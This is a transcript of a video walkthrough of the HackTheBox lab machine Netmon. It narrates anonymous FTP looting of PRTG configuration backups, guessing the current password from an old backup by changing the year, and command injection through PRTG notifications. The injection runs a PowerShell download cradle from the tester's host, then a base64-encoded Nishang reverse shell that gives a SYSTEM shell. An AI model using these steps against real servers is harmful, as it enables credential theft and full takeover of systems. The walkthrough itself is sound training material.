What's going on YouTube? This is Ipsec, and we're going to be doing Netmon from HackTheBox, which was an easy Windows machine that involved identifying the application PRTG network monitor on port 80, and also the open FTP share. By doing a few Googles, you can find out where PRTG stores its configuration, and then retrieve that configuration via FTP. But if you go for the most recent one, it is encrypted. If you go for the backup, which was taken about a year ago, you will see there are credentials that end in 2018. Because it is a backup config that's about a year old, just increment the password by 1 and get 2019 and log right into PRTG. From there, like many other sysadmin/monitoring applications, there are ways to execute code once you get administrative access on the web page. So we inject a code execution into, I think, a notification, and then just get an administrative shell. So with that being said, let's just jump in. As always, let's begin with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it netmon, and then the IP address, which is 10.10.10.152. Can take some time to run, so I've already ran it. Looking at the results, we have a handful of ports open. The first thing is FTP on port 21, and it's running the default Microsoft FTPD server. We have the nmap script telling us anonymous FTP login is allowed, and looking at the output, it looks like we have the root of C exposed, as we see Windows users and program files. So based upon this, we have read access to the C drive, which can give us tons of information, and even like patching information of Windows along with the Windows version, and configs of just services on the box. So having this access is pretty big. We'll go back to it probably really soon. The next thing we have is HTTP on port 80, and it's the Indie HTTPD web server, which I don't know what server this is. I'd expect to see like IIS or Apache here, but thankfully nmap tells us it's the Paisley PRTG bandwidth monitor. So probably the people that made it compiled a custom web server. The version information matches the HTTP header, and we also see it is the PRTG network monitor, and the hostname of the box is Netmon. So just basic information about the web page. Then we have the standard SMB ports, Microsoft Remote Procedural Call on 135, NetBIOS on 139, and Microsoft-DS, which is SMB, on port 445. So let's go over what each of these ports means. 445 means, well, we may be able to read files, but why would we want to read files when we already can read the root of C with FTP? But it also means if we ever get an administrative username, then we can just ps-exec and get admin or get a remote shell. Web servers are vulnerable. It can lead to anything, but web servers always have config files, and with FTP, we can read the config files of web servers. So that's probably going to be one of the first steps. But before I even do that, I want to get some information about the OS I'm on. So let's go into the Windows directory with FTP. Running FTP 10.10.10.152 will get us access. The username will be anonymous, the password will be anonymous, and nmap scripts had told us anonymous login was allowed, so that's why we did that. We'll do a dir command, and we can see that we're in the root of C. We can do dir-a to show hidden files. We could go into like recycle bin if we wanted to and see if anything's there. And looks like recycle bin is empty. But the main thing I want to look at is this Windows folder because it contains a bunch of information that we want. So I'm going to Google like Windows LFI files and see if we can find a blog post real quick. And I'm searching Windows LFI, which is local file inclusion, because normally when you have local file inclusion, you go after juicy files. We don't have local file inclusion, but we can still read the same juicy files. So I'm going to check out this blog post on Graceful Security, because I believe this one has some stuff. Yes, it does. So the first thing we want to look at is like Windows php.ini to tell us if PHP may be installed. So go into Windows, get php.ini. Cannot find the file, so it's not there. We can try to go into the repair directory. If we can get in there, maybe we can grab the SAM, which is a registry hive along with system, software, and security. We can go and get the host file of this box, which will potentially contain DNS information, maybe the host name. So if we do get system32 drives etc host, maybe we have to cd every time. Drivers etc git hosts, and then let's go back up. And I should have moved myself to the FTP directory or something before doing this, because all my files are just going to be in the root of where I'm at, which is annoying, but we can move them later. Win.ini, I don't know what this is, but may have good information. Going down, we have stuff in Panther. This is the directory where if you do a automated install, log files will get put here. And old versions of Windows, it would actually put passwords of the default account. Doesn't do that anymore, it redacts them, but it doesn't look like we have those files. If we look at unattended GC as well, we don't see the what files it want. unattend.xml or something. So there it is. So we also have debug net setup, which I think also may get created at install time. We'll give you some information about who installed it. So let's go into debug and see what's there. We don't have anything. So I think that's all the interesting files here. We could see if we can go into config. If we can go into config, we may be an administrator. Whoops. CD system 32, CD config. Can't go in there, so probably not administrator. We could also just go into users administrator, see if we can. We get access denied, so definitely not an admin of this box. There's only 2 users, so let's go look at public desktop. Can't get into desktop, but we can get a user.txt file, so we'll download that. And looks like it may have downloaded. So let's go back into Windows, and there's a few files I normally grab that's not on this LFI thing. So I like grabbing Windows update, I can type, Windows update.log, because this will tell us the patch level of machines when the last update was applied. If we haven't seen updates since like 2016, we may try something like Eternal Blue. So the next thing we want is in System32, and it's license.rtf, which is the license file for Windows. This will tell us if it's Windows 2008, 2012, 2016, 2019. So it tells us that, and I think that's what we want. So let's go take a look at these files. Let's move them into FTP to stay organized. So host, license, user, Windows, Win, into FTP. And then looking at these, let's look at the host file. We don't have anything there, didn't give us any extra host names. Let's look at license.rtf. And this is a rich text format, so it's a bit hard to read and less. We can open that in like LibreOffice to be a bit cleaner. But we see this is Windows 2016. We can look at Windows update.log. And it's telling us the log file is no longer here. It's generated using event tracing for Windows, which is a shame. We can look at win.ini. Doesn't give us anything. And then we can do a wc-c on user.txt. MD5 sums 32 characters. You got a line break, so chances are that is the user flag on this box. So since we couldn't get the information out of Windows update.log, I'm going to go into, I think it's software distribution. Yep, and then download and do a dir. And this is where like Windows updates get placed. And looking at this, I don't see any files, so chances are this box has never been updated since install. So that's it for, oh, that's not it for FTP. Let's do anonymous, and we have to go to a web browser and look at 10.10.10.152. We get this PRTG login. We can try logging in with admin. We can Google like PRTG network monitor default credential. See if we get anything here. PRTG admin is the default, so we can always try those. And we can't log in. So let's Google for PRTG network configuration file. And when Mr. Ben had created this box, he actually had it as defaults, and I had changed this just to be a little bit I guess, more difficult because it was default credentials and FTP wasn't there. I'm the one that had installed FTP when I was testing the machine and did this little next step. So if we look in program data, Paisleur PRTG network monitor, that's where this data directory is. And we know that because that's where it's telling us. It says in Windows 2016, it's here. In Windows XP 2003, it's in user profile application data. So let's go into program data. And then we go to Paisleur, and then PRTG network monitor, CD PRTG network monitor, CD PRTG network monitor, in quotes. There we go. And let's see, we got logs, we got configuration, and a bunch of other things. So let's grab the configuration file. So let's get prtg configuration.dat. And I didn't need to close out the quote. That's odd. I only did one quote here and it still downloaded it. And then I'm looking at this .old. It's the same file size, so chances are it's the same file, but we'll grab it in MD5 summon anyways. So let's grab that. And then we have this prtg configuration.old.back. And the date of this file is July 14th, 2018. And I also created this file and I put my birthday, July 14th, in place of the date created. So little Easter egg there, but let's get this file as well. And then let's look at them. So let's do MD5 sum on PRTG stir. And we see .dat and .old are the same file, so we can delete .old. So let's do rm that. And let's look at PRTG configuration.dat. And oh god, this is big. So I'm just going to do a grep-i user on the file name. We can do sort-u. Let's do said and replace every space with nothing. And now sort-u, which will get us a little less information to go through. So looking at this, we don't really see anything. We see the proxy user. That's not what we wanted. Let's do it on the, let's grep for password. See if we have anything here. So we don't, but we have everything in XML format, so we may be missing a line. So if we do grep-i, we can do -b for before 5, -a for after 5, and looking at this. And we get some data. So DB credentials still blank. Name. Let's do this against the old file and see what we have. Nothing really sticks out, so we may be stuck actually looking through this file, which will be annoying, but let's do .dat. What is it? Configuration.old.back. See what we have here. Password, that's a base 64. And we have something here. PRTG admin 2018. User PRTG admin. So let's take a look at this config and see where this line came out. And we also have password in some base 64. But let's look at PRTG configuration.old.back. And I think it was PRTGA. Here we go. We have the database password, PRTG admin, and then putting the credentials here. So the first thing I'm going to do is try logging in with the credentials in this backup file. So let's go to PRTG admin, paste this. Whoops. And we get login failed. So let's try logging into SMB with these. So let's do SMB map -u PRTG admin -p, put in the password -d for domain. We'll do Netmon -H 10.10.10 125 and 152. There we go. We also get a login failure here. So if you remember this oh, it closed. We can probably do a search for 14. There we go. We see these configs were done on February 25th, and this config, which has 2018 in it, was done in 2018. So what the chances are that they just incremented the year every time they change it. So let's try that. Let's do PRTG admin, increment the year by 1. Let's see. Let me copy and paste everything so I don't make a typo. There we go. And then copy this. Put 2019. Paste. Log in, and we get logged into this application. So I'm going to go and do a search exploit on it to see if there's anything interesting. So search exploit PRTG, and we have a denial of service, and I think it's actually vulnerable. I'm not positive, but that looks like the version we have. So nmap, what is it? Netmon.nmap. We're running version 13946, and this is definitely newer than that. So probably vulnerable to this, but it's a denial of service, so probably don't want to do that. So let's just poke around the application. We do maps, reports. We can look at a report I made, IPSEC special report. Taking a look at this, run report, we can view it as HTML, and it doesn't actually do anything. The only reason I created this report is because I put something in this application to revert it. So I wanted to make sure the report had got removed. So, and then I snapshotted it after I created this, and there you have it. It was just a fragment left in testing that I left as an Easter egg, but doesn't look like that's doing anything. We can also just look at CVEs for this application. Maybe no one created an exploit for this yet. So let's just do CRTG, PRTG, network monitor, which I think is the application's name. And we have the CVE details for this application. And we also have one down here that we should read 2018. So looking at this, it's a little bit odd because they don't have any CVEs in 2018, but Google is showing one is in 2018. And it's definitely the application. As we can see, it's saying in PRTG network monitor. I'm just going to click Hazler to see if there's anything here. Nope, missing 2018. And 2019 doesn't have a code execution. I normally don't care about cross-site scripting, but let's go to this. An issue was discovered in PRTG network monitor before 18.2.3.9. An attacker who accesses the system administrator web console with admin privileges can exploit an OS command injection vulnerability both on the server device by sending malformed parameters in sensor or notification management scenarios. So let's go back here and let's see. It said it's send email and sensor things, the sensor scenarios. So let's try to go here. Let's see. Click this little edit thing and check. Click settings, that little wrench, and see what we can do for ping. And don't see anything here. So looking back, it said in notification scenarios. So we have to figure out where in this application we can go to send notification emails. So the first place I'm going to check is the setup, and we'll try notification delivery. I hate that right click doesn't work in this application. But looking at this, I don't really see anything. Let's go back into setup. Let's click on notifications, and we have various ones. So I wonder if I can make this bigger. There we go. So I'm going to click here, and making this bigger made it so I can't click this wrench to go into settings. And we can look at this. We got the notification name, schedule, postpone, summarization, subjects, access rights, send email, push notification, yada, yada, yada. And then eventually we have execute program. So if we click this, we can have either execute outfile.bat or outfile.ps1. So I'm going to do outfile.bat first, and let's test this with test pipe ping /n1 to do one ping, 10.10.14.3, which is my IP address. I'm going to run tcp dump -i ton 0 ICMP, and we can click OK. And then under this ticket notification, I'm going to click resume and see what happens. We don't get a ping. Let's see. Is it clone, pause, send test notification. Try clicking that. Notification was triggered and queued to the recipients, and we don't have anything. So maybe I screwed up how to do ping, or this just didn't work. So let's see. I clicked on the bottom one, right? So outfile.bat. Let's do ping -n instead of /. And then also make sure my IP address is what I think it is, 10.10.14.3. That is correct. So let's send this test notification. Nothing happened. So let's try doing this through PowerShell. Let's do edit. We can execute program. Let's try outfile.ps1 and try this. Send test. And we get a ping. So for some reason in the .bat version, it didn't work. But in the PowerShell one, it does. So we have validated, we have command execution. So let's make dir dub, and we're going to grab a reverse shell. So cp opt nashang shells, then invoke TCP or invoke PowerShell TCP.ps1, and let's move that to something that's easier to type. So reverse.ps1. And then we just have to put our IP address. So let's grab this line, go to the bottom, paste it, and then we'll do 10.10.10 or 10.10.14.3 and port 9001. So now we have to set up a HTTP server. So cd www python-m simple HTTP server. Again, if I can type. And then netcat lvnp 9001. So we can go back into this little notification tab, click the wrench, and we'll try to do PowerShell again. So we'll do test pipe, and we can just do ix new object net.web client download string HTTP 10.10.14.3 port 8000, and we have to specify reverse.ps1. So I'm just going to copy this just in case something bad happens. And then let's send this test notification. We can see it made a GET request against our web server, and we don't have a shell, which is odd. So let's go into www less reverse.ps1 and 10.10.14.3 port 9001. So that should work, but it didn't. So let's just try something else. Let's do another execute. And let's see. Let's try putting this in quotes. Click go. So we got it twice. When we put the double quotes, it doesn't look like it got it at all. So we can try a quote to escape it. Let's go back to config. And let's do backslashes, which I don't think are necessary, but we can try this. Nothing worked. So I'm guessing something's weird with how it's processing a quote, just because the fact it's not working. We could try adding PowerShell here, but I really doubt it's going to do anything. So do this, click go. And it could also be, it can't talk to us on port 9001. So we could also just change this to be 80 and then edit a reverse.ps1. We gotta go in dub to be port 80. Test that again. And still nothing. So what I'm going to do is I'm going to eliminate bad characters by let's base64 encode this input and try doing it that way. So cat reverse.ps1 iconv to convert it to UTF-16 little endian, which is just how Windows has files formatted, base64-width 0 to copy everything, and we can probably paste that with, is it xclip dash clipboard primary, I think? Xclip dash H. So it's dash selection primary. Okay. So that should be in my clipboard. So we lost connection. Let's do, can we still edit this? Looks like we can't. So maybe the box rebooted. So let's log in with PRTG admin, and we have to get the password again. So let's go to FTP, grep PRTG out of, that's not an FTP. We did not move it there. So PRTG out of the configuration file. Let's do, maybe it's the 2018. Grep 2018 out of the file. And we get the password. Paste, backspace 19. Okay, let's go to setup, notifications. We can edit this, go to settings, go all the way down where it was execute a program. And we want to do outfile.ps1. And the parameter we'll do please subscribe, pipe it to PowerShell-ENC for encoded, and we have to grab that output again. Let's see. Is it selection clipboard? There we go. Click OK. Let's test the notification. And we have a shell. So if we do who am I, we're NT authority system because that's what this application runs as. So we can just go into users, administrator, and then desktop. And we could grab root.txt. So that was the box. Hope you guys enjoyed it. And if you're confused exactly what happened, remember the reverse.ps1 file. I just encrypted that, or not encrypted, encoded that in base 64, and then had PowerShell execute that base 64. So it just didn't like some character I had in the previous string, probably a quote. I don't know what it was, but take care, and I will see you all next week.